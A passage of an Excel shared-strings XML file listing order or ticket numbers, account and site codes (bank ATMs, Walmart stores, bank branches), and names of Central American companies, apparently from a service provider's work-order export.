    <t>284500053T</t>
  </si>
  <si>
    <t>MP230101057SSV</t>
  </si>
  <si>
    <t>MP230601056SSV</t>
  </si>
  <si>
    <t>61200234T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM5033</t>
  </si>
  <si>
    <t>F4567864</t>
  </si>
  <si>
    <t>F4567865</t>
  </si>
  <si>
    <t>F4567873</t>
  </si>
  <si>
    <t>1554803OH</t>
  </si>
  <si>
    <t>GRUPO HON S A  GRUPO HON S A</t>
  </si>
  <si>
    <t>F4567877</t>
  </si>
  <si>
    <t>F4567890</t>
  </si>
  <si>
    <t>F4567894</t>
  </si>
  <si>
    <t>F4567897</t>
  </si>
  <si>
    <t>F4567908</t>
  </si>
  <si>
    <t>F4567911</t>
  </si>
  <si>
    <t>F4567912</t>
  </si>
  <si>
    <t>F4567913</t>
  </si>
  <si>
    <t>8901379T</t>
  </si>
  <si>
    <t>IP2046010SV</t>
  </si>
  <si>
    <t>245700101T</t>
  </si>
  <si>
    <t>F4567926</t>
  </si>
  <si>
    <t>90001905717T</t>
  </si>
  <si>
    <t>F4567930</t>
  </si>
  <si>
    <t>F4567933</t>
  </si>
  <si>
    <t>F4567937</t>
  </si>
  <si>
    <t>F4567939</t>
  </si>
  <si>
    <t>IDG000551SV</t>
  </si>
  <si>
    <t>F4567942</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0706</t>
  </si>
  <si>
    <t>F4567946</t>
  </si>
  <si>
    <t>IDG000566SV</t>
  </si>
  <si>
    <t>913600002T</t>
  </si>
  <si>
    <t>WIFI PLUS, VERAPAZ.NET, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>CC_UNICOMER_GT_CALZADA_KAIBIL_BALAM</t>
  </si>
  <si>
    <t>749000004T</t>
  </si>
  <si>
    <t>LOSA INVERSIONES, S.A.</t>
  </si>
  <si>
    <t>F4567967</t>
  </si>
  <si>
    <t>F4567976</t>
  </si>
  <si>
    <t>F4567984</t>
  </si>
  <si>
    <t>F4567986</t>
  </si>
  <si>
    <t>F4567987</t>
  </si>
  <si>
    <t>541100001T</t>
  </si>
  <si>
    <t>DIAGNOSTICOS INTEGRALES DE SALUD SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4545483</t>
  </si>
  <si>
    <t>F4545550</t>
  </si>
  <si>
    <t>86100071T</t>
  </si>
  <si>
    <t>F4572281</t>
  </si>
  <si>
    <t>F4572285</t>
  </si>
  <si>
    <t>F4572301</t>
  </si>
  <si>
    <t>340500008T</t>
  </si>
  <si>
    <t>340500031T</t>
  </si>
  <si>
    <t>F4572321</t>
  </si>
  <si>
    <t>F4572322</t>
  </si>
  <si>
    <t>727100075T</t>
  </si>
  <si>
    <t>F4572336</t>
  </si>
  <si>
    <t>827000001T</t>
  </si>
  <si>
    <t>ASOCIACIÓN ALTAVISTA GOLF &amp; TENIS CLUB</t>
  </si>
  <si>
    <t>F4572352</t>
  </si>
  <si>
    <t>F4572355</t>
  </si>
  <si>
    <t>F4572361</t>
  </si>
  <si>
    <t>F4572363</t>
  </si>
  <si>
    <t>F4572366</t>
  </si>
  <si>
    <t>F4572367</t>
  </si>
  <si>
    <t>F4572369</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4076</t>
  </si>
  <si>
    <t>F4572372</t>
  </si>
  <si>
    <t>F4572377</t>
  </si>
  <si>
    <t>3617893ON</t>
  </si>
  <si>
    <t>519478OH</t>
  </si>
  <si>
    <t>F4572389</t>
  </si>
  <si>
    <t>F4572390</t>
  </si>
  <si>
    <t>F4572391</t>
  </si>
  <si>
    <t>323800005T</t>
  </si>
  <si>
    <t>F4565876</t>
  </si>
  <si>
    <t>F4565884</t>
  </si>
  <si>
    <t>F4565886</t>
  </si>
  <si>
    <t>F4565890</t>
  </si>
  <si>
    <t>F4565891</t>
  </si>
  <si>
    <t>F4565894</t>
  </si>
  <si>
    <t>F4565901</t>
  </si>
  <si>
    <t>F4565902</t>
  </si>
  <si>
    <t>F4565911</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0757</t>
  </si>
  <si>
    <t>F4565912</t>
  </si>
  <si>
    <t>913100003T</t>
  </si>
  <si>
    <t>INGENIERIA AVANZADA DE CENTROAMERICA,S.A.</t>
  </si>
  <si>
    <t>F4565919</t>
  </si>
  <si>
    <t>F4565937</t>
  </si>
  <si>
    <t>F4565940</t>
  </si>
  <si>
    <t>F4565945</t>
  </si>
  <si>
    <t>17400163T</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC003284</t>
  </si>
  <si>
    <t>F4565961</t>
  </si>
  <si>
    <t>90001909001T</t>
  </si>
  <si>
    <t>IDG000273SV</t>
  </si>
  <si>
    <t>TRANSPORTES SEBASTIAN S.A. DE C.V.</t>
  </si>
  <si>
    <t>90001909127T</t>
  </si>
  <si>
    <t>F4565965</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4236</t>
  </si>
  <si>
    <t>F4565971</t>
  </si>
  <si>
    <t>1724314OH</t>
  </si>
  <si>
    <t>F4565979</t>
  </si>
  <si>
    <t>F4565981</t>
  </si>
  <si>
    <t>F4541830</t>
  </si>
  <si>
    <t>532200001T</t>
  </si>
  <si>
    <t>FEDERACION LUTERANA MUNDIAL</t>
  </si>
  <si>
    <t>F4569609</t>
  </si>
  <si>
    <t>F4569610</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1360</t>
  </si>
  <si>
    <t>F4569611</t>
  </si>
  <si>
    <t>F4569612</t>
  </si>
  <si>
    <t>F4569613</t>
  </si>
  <si>
    <t>340500052T</t>
  </si>
  <si>
    <t>F4569639</t>
  </si>
  <si>
    <t>872800001T</t>
  </si>
  <si>
    <t>REPUESTOS ASOCIADOS, S.A.</t>
  </si>
  <si>
    <t>F4569644</t>
  </si>
  <si>
    <t>558400005T</t>
  </si>
  <si>
    <t>361700008T</t>
  </si>
  <si>
    <t>F4569658</t>
  </si>
  <si>
    <t>F4569666</t>
  </si>
  <si>
    <t>F4569676</t>
  </si>
  <si>
    <t>F4569682</t>
  </si>
  <si>
    <t>F4569683</t>
  </si>
  <si>
    <t>F4569695</t>
  </si>
  <si>
    <t>22459200SV</t>
  </si>
  <si>
    <t>CORPORACION DE SERVICIOS DE SALUD S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4569708</t>
  </si>
  <si>
    <t>F4569711</t>
  </si>
  <si>
    <t>90001910185T</t>
  </si>
  <si>
    <t>888500001T</t>
  </si>
  <si>
    <t>SERVICIOS WIN, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>849345OH</t>
  </si>
  <si>
    <t>F4569719</t>
  </si>
  <si>
    <t>F4559600</t>
  </si>
  <si>
    <t>CC_WALMART_SV_DF_EL_CONGO</t>
  </si>
  <si>
    <t>458000004T</t>
  </si>
  <si>
    <t>CONCESIONARIA VUELA COMPAÑIA DE AVIACION S.A. P.I. DE C.V.</t>
  </si>
  <si>
    <t>F4559695</t>
  </si>
  <si>
    <t>F4559744</t>
  </si>
  <si>
    <t>1041851OH</t>
  </si>
  <si>
    <t>F4559746</t>
  </si>
  <si>
    <t>F4573811</t>
  </si>
  <si>
    <t>F4573823</t>
  </si>
  <si>
    <t>F4573833</t>
  </si>
  <si>
    <t>F4573836</t>
  </si>
  <si>
    <t>F4573840</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4028</t>
  </si>
  <si>
    <t>47502169T</t>
  </si>
  <si>
    <t>F4573862</t>
  </si>
  <si>
    <t>F4573880</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_INCAPIE_ZONA13</t>
  </si>
  <si>
    <t>F4573943</t>
  </si>
  <si>
    <t>F4573946</t>
  </si>
  <si>
    <t>245700047T</t>
  </si>
  <si>
    <t>F4573970</t>
  </si>
  <si>
    <t>F4573978</t>
  </si>
  <si>
    <t>F4572406</t>
  </si>
  <si>
    <t>F4572407</t>
  </si>
  <si>
    <t>727100125T</t>
  </si>
  <si>
    <t>F4572411</t>
  </si>
  <si>
    <t>F4572422</t>
  </si>
  <si>
    <t>F4572425</t>
  </si>
  <si>
    <t>F4572426</t>
  </si>
  <si>
    <t>F4572433</t>
  </si>
  <si>
    <t>5344585ON</t>
  </si>
  <si>
    <t>F4572448</t>
  </si>
  <si>
    <t>5344589ON</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC003237</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4149</t>
  </si>
  <si>
    <t>F4572471</t>
  </si>
  <si>
    <t>F4572472</t>
  </si>
  <si>
    <t>497800001T</t>
  </si>
  <si>
    <t>INMOBILIARIA GEOTAR S.A.</t>
  </si>
  <si>
    <t>F4572486</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0117</t>
  </si>
  <si>
    <t>F4572488</t>
  </si>
  <si>
    <t>F4572490</t>
  </si>
  <si>
    <t>F4572492</t>
  </si>
  <si>
    <t>F4572493</t>
  </si>
  <si>
    <t>245700016T</t>
  </si>
  <si>
    <t>F4572494</t>
  </si>
  <si>
    <t>21337600SV</t>
  </si>
  <si>
    <t>8900744T</t>
  </si>
  <si>
    <t>500200002T</t>
  </si>
  <si>
    <t>F4572514</t>
  </si>
  <si>
    <t>F4572525</t>
  </si>
  <si>
    <t>F4572527</t>
  </si>
  <si>
    <t>1407507OH</t>
  </si>
  <si>
    <t xml:space="preserve">COBRANZAS Y ASESORIAS CORPORATIVAS						</t>
  </si>
  <si>
    <t>IP2134049SV</t>
  </si>
  <si>
    <t>F4572544</t>
  </si>
  <si>
    <t>F4572556</t>
  </si>
  <si>
    <t>99900372T</t>
  </si>
  <si>
    <t>F4544194</t>
  </si>
  <si>
    <t>F4573989</t>
  </si>
  <si>
    <t>1282420OH</t>
  </si>
  <si>
    <t>F4574003</t>
  </si>
  <si>
    <t>F4574009</t>
  </si>
  <si>
    <t>F4574019</t>
  </si>
  <si>
    <t>F4574042</t>
  </si>
  <si>
    <t>F4574075</t>
  </si>
  <si>
    <t>F4574081</t>
  </si>
  <si>
    <t>F4574082</t>
  </si>
  <si>
    <t>F4574091</t>
  </si>
  <si>
    <t>90001900584T</t>
  </si>
  <si>
    <t>F4574094</t>
  </si>
  <si>
    <t>F4574095</t>
  </si>
  <si>
    <t>F4574097</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0142</t>
  </si>
  <si>
    <t>F4574099</t>
  </si>
  <si>
    <t>F4574101</t>
  </si>
  <si>
    <t>F4574123</t>
  </si>
  <si>
    <t>61300018T</t>
  </si>
  <si>
    <t>884404OH</t>
  </si>
  <si>
    <t>F4574131</t>
  </si>
  <si>
    <t>539600034T</t>
  </si>
  <si>
    <t>F4563538</t>
  </si>
  <si>
    <t>F4563542</t>
  </si>
  <si>
    <t>427100073T</t>
  </si>
  <si>
    <t>F4563562</t>
  </si>
  <si>
    <t>F4563596</t>
  </si>
  <si>
    <t>F4563597</t>
  </si>
  <si>
    <t>F4563600</t>
  </si>
  <si>
    <t>F4563622</t>
  </si>
  <si>
    <t>F4563633</t>
  </si>
  <si>
    <t>893042OC</t>
  </si>
  <si>
    <t>F4563638</t>
  </si>
  <si>
    <t>F4563667</t>
  </si>
  <si>
    <t>F4578477</t>
  </si>
  <si>
    <t>F4578481</t>
  </si>
  <si>
    <t>F4578483</t>
  </si>
  <si>
    <t>F4578485</t>
  </si>
  <si>
    <t>F4578489</t>
  </si>
  <si>
    <t>F4578491</t>
  </si>
  <si>
    <t>F4578492</t>
  </si>
  <si>
    <t>F4578493</t>
  </si>
  <si>
    <t>F4578497</t>
  </si>
  <si>
    <t>F4578510</t>
  </si>
  <si>
    <t>F4578522</t>
  </si>
  <si>
    <t>F4578530</t>
  </si>
  <si>
    <t>F4578537</t>
  </si>
  <si>
    <t>F4578538</t>
  </si>
  <si>
    <t>F4578548</t>
  </si>
  <si>
    <t>F4578561</t>
  </si>
  <si>
    <t>349900100T</t>
  </si>
  <si>
    <t>F4578565</t>
  </si>
  <si>
    <t>F4578571</t>
  </si>
  <si>
    <t>F4578583</t>
  </si>
  <si>
    <t>F4578593</t>
  </si>
  <si>
    <t>F4578594</t>
  </si>
  <si>
    <t>863400080T</t>
  </si>
  <si>
    <t>F4572897</t>
  </si>
  <si>
    <t>F4572907</t>
  </si>
  <si>
    <t>F4572913</t>
  </si>
  <si>
    <t>F4572914</t>
  </si>
  <si>
    <t>F4572915</t>
  </si>
  <si>
    <t>F4572916</t>
  </si>
  <si>
    <t>47503018T</t>
  </si>
  <si>
    <t>F4572926</t>
  </si>
  <si>
    <t>F4572938</t>
  </si>
  <si>
    <t>F4572957</t>
  </si>
  <si>
    <t>F4572958</t>
  </si>
  <si>
    <t>F4572973</t>
  </si>
  <si>
    <t>F4572974</t>
  </si>
  <si>
    <t>910730OC</t>
  </si>
  <si>
    <t>CARSO CONSTRUCCIÓN DE COSTA RICA SOCIEDAD ANÓNIMA</t>
  </si>
  <si>
    <t>F4572979</t>
  </si>
  <si>
    <t>F4572997</t>
  </si>
  <si>
    <t>F4572999</t>
  </si>
  <si>
    <t>IP2129144SV</t>
  </si>
  <si>
    <t>F4573035</t>
  </si>
  <si>
    <t>F4573041</t>
  </si>
  <si>
    <t>F4582810</t>
  </si>
  <si>
    <t>F4582821</t>
  </si>
  <si>
    <t>401900010T</t>
  </si>
  <si>
    <t>F4582827</t>
  </si>
  <si>
    <t>F4582831</t>
  </si>
  <si>
    <t>F4582832</t>
  </si>
  <si>
    <t>F4582837</t>
  </si>
  <si>
    <t>F4582839</t>
  </si>
  <si>
    <t>F4582844</t>
  </si>
  <si>
    <t>F4582850</t>
  </si>
  <si>
    <t>F4582862</t>
  </si>
  <si>
    <t>F4582871</t>
  </si>
  <si>
    <t>F4582894</t>
  </si>
  <si>
    <t>F4582896</t>
  </si>
  <si>
    <t>F4582906</t>
  </si>
  <si>
    <t>F4582935</t>
  </si>
  <si>
    <t>F4570484</t>
  </si>
  <si>
    <t>21324900SV</t>
  </si>
  <si>
    <t>SERMA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4570494</t>
  </si>
  <si>
    <t>90001906306T</t>
  </si>
  <si>
    <t>F4570500</t>
  </si>
  <si>
    <t>F4570503</t>
  </si>
  <si>
    <t>1477682OH</t>
  </si>
  <si>
    <t>LATIN AMERICAN ARMORED RENTALS SA</t>
  </si>
  <si>
    <t>F4570506</t>
  </si>
  <si>
    <t>F4570517</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3468</t>
  </si>
  <si>
    <t>F4570524</t>
  </si>
  <si>
    <t>8600182T</t>
  </si>
  <si>
    <t>F4570555</t>
  </si>
  <si>
    <t>90001910337T</t>
  </si>
  <si>
    <t>827400004T</t>
  </si>
  <si>
    <t>REPRESENTACIONES BYALKA, S.A.</t>
  </si>
  <si>
    <t>47500583T</t>
  </si>
  <si>
    <t>ID1024239SV</t>
  </si>
  <si>
    <t>F4570565</t>
  </si>
  <si>
    <t>ID1024260SV</t>
  </si>
  <si>
    <t>F4570569</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3753</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2037</t>
  </si>
  <si>
    <t>F4570583</t>
  </si>
  <si>
    <t>F4570585</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_159</t>
  </si>
  <si>
    <t>F4570587</t>
  </si>
  <si>
    <t>F4570588</t>
  </si>
  <si>
    <t>F4570591</t>
  </si>
  <si>
    <t>575600003T</t>
  </si>
  <si>
    <t>COOPERATIVA DE AHORRO Y CREDITO INTEGRAL "LA ESPERANZA CHIANTLECA" R.L</t>
  </si>
  <si>
    <t>331000143T</t>
  </si>
  <si>
    <t>F4570626</t>
  </si>
  <si>
    <t>F4570627</t>
  </si>
  <si>
    <t>F4613078</t>
  </si>
  <si>
    <t>F4613099</t>
  </si>
  <si>
    <t>F4613120</t>
  </si>
  <si>
    <t>F4613139</t>
  </si>
  <si>
    <t>F4613165</t>
  </si>
  <si>
    <t>F4613168</t>
  </si>
  <si>
    <t>F4613199</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4155</t>
  </si>
  <si>
    <t>1581427OH</t>
  </si>
  <si>
    <t>F4622710</t>
  </si>
  <si>
    <t>910400123T</t>
  </si>
  <si>
    <t>F4622723</t>
  </si>
  <si>
    <t>387200003T</t>
  </si>
  <si>
    <t>TRANSPORTES PIMAN S.A.</t>
  </si>
  <si>
    <t>892600001T</t>
  </si>
  <si>
    <t>FRUTAS TROPICALES DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>90001909578T</t>
  </si>
  <si>
    <t>F4622732</t>
  </si>
  <si>
    <t>758500258T</t>
  </si>
  <si>
    <t>910400075T</t>
  </si>
  <si>
    <t>F4622741</t>
  </si>
  <si>
    <t>F4622748</t>
  </si>
  <si>
    <t>483300001T</t>
  </si>
  <si>
    <t>F4622754</t>
  </si>
  <si>
    <t>22463400SV</t>
  </si>
  <si>
    <t>WHOLE CHILD INTERNATIONAL S.A DE C.V</t>
  </si>
  <si>
    <t>8900923T</t>
  </si>
  <si>
    <t>F4622767</t>
  </si>
  <si>
    <t>607828ON</t>
  </si>
  <si>
    <t>F4622784</t>
  </si>
  <si>
    <t>F4622787</t>
  </si>
  <si>
    <t>F4622788</t>
  </si>
  <si>
    <t>F4622797</t>
  </si>
  <si>
    <t>F4622803</t>
  </si>
  <si>
    <t>25090200SV</t>
  </si>
  <si>
    <t>LETERAGO S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4622819</t>
  </si>
  <si>
    <t>F4622831</t>
  </si>
  <si>
    <t>313900344T</t>
  </si>
  <si>
    <t>F4622838</t>
  </si>
  <si>
    <t>921500037T</t>
  </si>
  <si>
    <t>F4545831</t>
  </si>
  <si>
    <t>F4545835</t>
  </si>
  <si>
    <t>F4545901</t>
  </si>
  <si>
    <t>F4545919</t>
  </si>
  <si>
    <t>F4567401</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_PALIN</t>
  </si>
  <si>
    <t>F4567413</t>
  </si>
  <si>
    <t>90001910803T</t>
  </si>
  <si>
    <t>F4567421</t>
  </si>
  <si>
    <t>F4567423</t>
  </si>
  <si>
    <t>F4567428</t>
  </si>
  <si>
    <t>F4567438</t>
  </si>
  <si>
    <t>F4567441</t>
  </si>
  <si>
    <t>ID1053022SV</t>
  </si>
  <si>
    <t>F4567445</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0492</t>
  </si>
  <si>
    <t>834287OC</t>
  </si>
  <si>
    <t>F4567463</t>
  </si>
  <si>
    <t>F4567464</t>
  </si>
  <si>
    <t>F4567468</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AUTOBANCO_Z7</t>
  </si>
  <si>
    <t>F4567473</t>
  </si>
  <si>
    <t>7801029T</t>
  </si>
  <si>
    <t>F4567493</t>
  </si>
  <si>
    <t>297400150T</t>
  </si>
  <si>
    <t>F4567510</t>
  </si>
  <si>
    <t>625900193T</t>
  </si>
  <si>
    <t>F4567516</t>
  </si>
  <si>
    <t>IP2035044SV</t>
  </si>
  <si>
    <t>F4567523</t>
  </si>
  <si>
    <t>F4567524</t>
  </si>
  <si>
    <t>F4567526</t>
  </si>
  <si>
    <t>F4567529</t>
  </si>
  <si>
    <t>F4567532</t>
  </si>
  <si>
    <t>F4567538</t>
  </si>
  <si>
    <t>F4567540</t>
  </si>
  <si>
    <t>MP232202014SSV</t>
  </si>
  <si>
    <t>F4567543</t>
  </si>
  <si>
    <t>4879501ON</t>
  </si>
  <si>
    <t>ON0002096489/COMPANIA CERVECERA DE NICARAGUA, S. A-</t>
  </si>
  <si>
    <t>F4592822</t>
  </si>
  <si>
    <t>25298000SV</t>
  </si>
  <si>
    <t>INDUSTRIAS LA CONSTANCIA S.A. DE C.V</t>
  </si>
  <si>
    <t>400000098T</t>
  </si>
  <si>
    <t>F4592834</t>
  </si>
  <si>
    <t>F4592837</t>
  </si>
  <si>
    <t>427100026T</t>
  </si>
  <si>
    <t>F4592839</t>
  </si>
  <si>
    <t>F4592845</t>
  </si>
  <si>
    <t>645400001T</t>
  </si>
  <si>
    <t>ANOMALIA</t>
  </si>
  <si>
    <t>F4592853</t>
  </si>
  <si>
    <t>F4592856</t>
  </si>
  <si>
    <t>F4592862</t>
  </si>
  <si>
    <t>606000001T</t>
  </si>
  <si>
    <t>REFAMA REPUESTOS, S.A.</t>
  </si>
  <si>
    <t>F4592875</t>
  </si>
  <si>
    <t>357500032T</t>
  </si>
  <si>
    <t>F4592876</t>
  </si>
  <si>
    <t>F4592878</t>
  </si>
  <si>
    <t>F4592881</t>
  </si>
  <si>
    <t>1422923OH</t>
  </si>
  <si>
    <t>569144OH</t>
  </si>
  <si>
    <t>F4592896</t>
  </si>
  <si>
    <t>F4592897</t>
  </si>
  <si>
    <t>503100002T</t>
  </si>
  <si>
    <t>CENTRO MEDICO INTEGRAL NUEVA SANTA ROSA S.A.</t>
  </si>
  <si>
    <t>503100001T</t>
  </si>
  <si>
    <t>F4592918</t>
  </si>
  <si>
    <t>F4592925</t>
  </si>
  <si>
    <t>758500162T</t>
  </si>
  <si>
    <t>340500086T</t>
  </si>
  <si>
    <t>F4592935</t>
  </si>
  <si>
    <t>90001910772T</t>
  </si>
  <si>
    <t>F4592942</t>
  </si>
  <si>
    <t>IPG003615SV</t>
  </si>
  <si>
    <t>F4592955</t>
  </si>
  <si>
    <t>F4592956</t>
  </si>
  <si>
    <t>F4592957</t>
  </si>
  <si>
    <t>ID1281001SV</t>
  </si>
  <si>
    <t>F4592962</t>
  </si>
  <si>
    <t>IP2281004SV</t>
  </si>
  <si>
    <t>F4592966</t>
  </si>
  <si>
    <t>F4603096</t>
  </si>
  <si>
    <t>1536587OH</t>
  </si>
  <si>
    <t>TREADWAY INTERNATIONAL</t>
  </si>
  <si>
    <t>F4603105</t>
  </si>
  <si>
    <t>22492000SV</t>
  </si>
  <si>
    <t>NEW SMART S.E.M. DE C.V.</t>
  </si>
  <si>
    <t>F4603117</t>
  </si>
  <si>
    <t>F4603119</t>
  </si>
  <si>
    <t>F4603124</t>
  </si>
  <si>
    <t>F4603125</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_SALA27</t>
  </si>
  <si>
    <t>F4603139</t>
  </si>
  <si>
    <t>F4603140</t>
  </si>
  <si>
    <t>F4603149</t>
  </si>
  <si>
    <t>331000084T</t>
  </si>
  <si>
    <t>F4603161</t>
  </si>
  <si>
    <t>IP2037313SV</t>
  </si>
  <si>
    <t>F4603170</t>
  </si>
  <si>
    <t>F4603171</t>
  </si>
  <si>
    <t>F4603184</t>
  </si>
  <si>
    <t>F4603195</t>
  </si>
  <si>
    <t>F4603196</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2051</t>
  </si>
  <si>
    <t>F4603202</t>
  </si>
  <si>
    <t>F4603209</t>
  </si>
  <si>
    <t>790688OC</t>
  </si>
  <si>
    <t>CARSO CONSTRUCCION DE COSTA RICA S.A.</t>
  </si>
  <si>
    <t>F4603230</t>
  </si>
  <si>
    <t>F4603233</t>
  </si>
  <si>
    <t>908200001T</t>
  </si>
  <si>
    <t>SOLUCIONES INTEGRADAS MODERNAS, S.A</t>
  </si>
  <si>
    <t>F4591290</t>
  </si>
  <si>
    <t>F4591297</t>
  </si>
  <si>
    <t>53700021T</t>
  </si>
  <si>
    <t>F4591305</t>
  </si>
  <si>
    <t>363900002T</t>
  </si>
  <si>
    <t>EXTRACTORA LA FRANCIA S.A.</t>
  </si>
  <si>
    <t>831500001T</t>
  </si>
  <si>
    <t>NUEVOS ETICOS NEOETHICALS, S.A.</t>
  </si>
  <si>
    <t>822663OH</t>
  </si>
  <si>
    <t>F4591324</t>
  </si>
  <si>
    <t>F4591333</t>
  </si>
  <si>
    <t>331000100T</t>
  </si>
  <si>
    <t>F4591339</t>
  </si>
  <si>
    <t>F4591346</t>
  </si>
  <si>
    <t>61300027T</t>
  </si>
  <si>
    <t>F4591348</t>
  </si>
  <si>
    <t>1118829OH</t>
  </si>
  <si>
    <t>90001908969T</t>
  </si>
  <si>
    <t>F4591354</t>
  </si>
  <si>
    <t>F4591360</t>
  </si>
  <si>
    <t>F4591362</t>
  </si>
  <si>
    <t>IP2024147SV</t>
  </si>
  <si>
    <t>47502298T</t>
  </si>
  <si>
    <t>F4591369</t>
  </si>
  <si>
    <t>F4591371</t>
  </si>
  <si>
    <t>348400005T</t>
  </si>
  <si>
    <t>596900001T</t>
  </si>
  <si>
    <t>GASABISA, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>625900177T</t>
  </si>
  <si>
    <t>F4591391</t>
  </si>
  <si>
    <t>F4591392</t>
  </si>
  <si>
    <t>4439296ON</t>
  </si>
  <si>
    <t>F4591398</t>
  </si>
  <si>
    <t>29500081T</t>
  </si>
  <si>
    <t>F4591401</t>
  </si>
  <si>
    <t>F4591409</t>
  </si>
  <si>
    <t>F4591415</t>
  </si>
  <si>
    <t>F4591418</t>
  </si>
  <si>
    <t>910400007T</t>
  </si>
  <si>
    <t>F4591426</t>
  </si>
  <si>
    <t>250700009T</t>
  </si>
  <si>
    <t>EMISORAS UNIDAS DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4606101</t>
  </si>
  <si>
    <t>F4606183</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3048</t>
  </si>
  <si>
    <t>F4606201</t>
  </si>
  <si>
    <t>F4606202</t>
  </si>
  <si>
    <t>F4611842</t>
  </si>
  <si>
    <t>F4611845</t>
  </si>
  <si>
    <t>F4611858</t>
  </si>
  <si>
    <t>F4611860</t>
  </si>
  <si>
    <t>F4611868</t>
  </si>
  <si>
    <t>F4611869</t>
  </si>
  <si>
    <t>CC_WALMART_SV_DDJ_AYUTUXTEPEQUE</t>
  </si>
  <si>
    <t>F4611879</t>
  </si>
  <si>
    <t>582200001T</t>
  </si>
  <si>
    <t>446100005T</t>
  </si>
  <si>
    <t>90001909017T</t>
  </si>
  <si>
    <t>F4611895</t>
  </si>
  <si>
    <t>292900094T</t>
  </si>
  <si>
    <t>1422867OH</t>
  </si>
  <si>
    <t>ID1035033SV</t>
  </si>
  <si>
    <t>COOPERATIVA AHORROS ELECTRA</t>
  </si>
  <si>
    <t>1045344OH</t>
  </si>
  <si>
    <t>1221422OH</t>
  </si>
  <si>
    <t>REPUESTOS PARA CAMIONES S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4611921</t>
  </si>
  <si>
    <t>F4611922</t>
  </si>
  <si>
    <t>90001903560T</t>
  </si>
  <si>
    <t>F4611924</t>
  </si>
  <si>
    <t>F4611929</t>
  </si>
  <si>
    <t>F4611930</t>
  </si>
  <si>
    <t>22458890SV</t>
  </si>
  <si>
    <t>826900017T</t>
  </si>
  <si>
    <t>F4611945</t>
  </si>
  <si>
    <t>F4611950</t>
  </si>
  <si>
    <t>917800006T</t>
  </si>
  <si>
    <t>F4611958</t>
  </si>
  <si>
    <t>CONTR0001633138OC</t>
  </si>
  <si>
    <t>F4570644</t>
  </si>
  <si>
    <t>F4570653</t>
  </si>
  <si>
    <t>F4570661</t>
  </si>
  <si>
    <t>F4570671</t>
  </si>
  <si>
    <t>F4570691</t>
  </si>
  <si>
    <t>F4570709</t>
  </si>
  <si>
    <t>F4570710</t>
  </si>
  <si>
    <t>F4570722</t>
  </si>
  <si>
    <t>F4570731</t>
  </si>
  <si>
    <t>F4570734</t>
  </si>
  <si>
    <t>F4570750</t>
  </si>
  <si>
    <t>F4570752</t>
  </si>
  <si>
    <t>F4570764</t>
  </si>
  <si>
    <t>F4570789</t>
  </si>
  <si>
    <t>F4570793</t>
  </si>
  <si>
    <t>F4614522</t>
  </si>
  <si>
    <t>F4614527</t>
  </si>
  <si>
    <t>F4614528</t>
  </si>
  <si>
    <t>F4614553</t>
  </si>
  <si>
    <t>F4614564</t>
  </si>
  <si>
    <t>FH3001</t>
  </si>
  <si>
    <t>F4614567</t>
  </si>
  <si>
    <t>F4614570</t>
  </si>
  <si>
    <t>214800009T</t>
  </si>
  <si>
    <t>F4614602</t>
  </si>
  <si>
    <t>939700001T</t>
  </si>
  <si>
    <t>NOVEX,S.A.</t>
  </si>
  <si>
    <t>F4614625</t>
  </si>
  <si>
    <t>F4614633</t>
  </si>
  <si>
    <t>F4517516</t>
  </si>
  <si>
    <t>F4548732</t>
  </si>
  <si>
    <t>F4548739</t>
  </si>
  <si>
    <t>F4548741</t>
  </si>
  <si>
    <t>F4548742</t>
  </si>
  <si>
    <t>20556810</t>
  </si>
  <si>
    <t>Comercial Rali S.A.</t>
  </si>
  <si>
    <t>F4548758</t>
  </si>
  <si>
    <t>F4548761</t>
  </si>
  <si>
    <t>F4548774</t>
  </si>
  <si>
    <t>47503090T</t>
  </si>
  <si>
    <t>F4548791</t>
  </si>
  <si>
    <t>F4548792</t>
  </si>
  <si>
    <t>1599467OH</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_INTERNET_JUTIAPA</t>
  </si>
  <si>
    <t>F4548796</t>
  </si>
  <si>
    <t>1599591OH</t>
  </si>
  <si>
    <t>90001911221T</t>
  </si>
  <si>
    <t>F4548806</t>
  </si>
  <si>
    <t>770600049T</t>
  </si>
  <si>
    <t>IP2029286SV</t>
  </si>
  <si>
    <t>F4548811</t>
  </si>
  <si>
    <t>770600005T</t>
  </si>
  <si>
    <t>F4548818</t>
  </si>
  <si>
    <t>F4548820</t>
  </si>
  <si>
    <t>F4548821</t>
  </si>
  <si>
    <t>F4548826</t>
  </si>
  <si>
    <t>F4548828</t>
  </si>
  <si>
    <t>F4548843</t>
  </si>
  <si>
    <t>625900008T</t>
  </si>
  <si>
